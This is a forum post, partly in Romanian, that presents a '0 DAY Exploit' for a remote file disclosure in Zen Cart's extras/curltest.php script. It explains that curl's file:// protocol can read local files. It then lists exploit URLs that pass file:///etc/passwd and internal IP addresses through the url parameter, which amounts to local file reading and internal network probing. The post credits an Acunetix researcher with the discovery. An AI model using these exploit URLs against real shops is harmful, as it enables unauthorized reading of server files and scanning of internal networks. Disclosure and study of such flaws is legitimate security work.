Jump to content
hozarares

0 DAY Exploit (Zen Cart suffers from a remote file disclosure vulnerability)

Recommended Posts

Usually, curl is used to connect and retrieve data from a remote URL

using the http protocol. However, curl supports a bunch of protocols.

One of these protocols is the file protocol. Using this protocol you can

read local files by using an URL like file:///etc/passwd. Therefore, if

the user can control the URL passed to curl_exec, in some cases (if the

content is echoed back) he can read local files.

Vulnerabilitatea afecteaza " /zen-cart/extras/curltest.php "

Exemplu :

http://site/zen-cart/extras/curltest.php?url=http://192.168.0.1 or

http://site/zen-cart/extras/curltest.php?url=http://192.168.1.1.

http://site/zen-cart/extras/curltest.php?url=file:///etc/passwd

Vulnerabilitatea descoperita de catre Bogdan Calin

( Acunetix )

2mg73i9.jpg

2wg9hk8.jpg

s1kn7c.jpg

Edited by hozarares
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...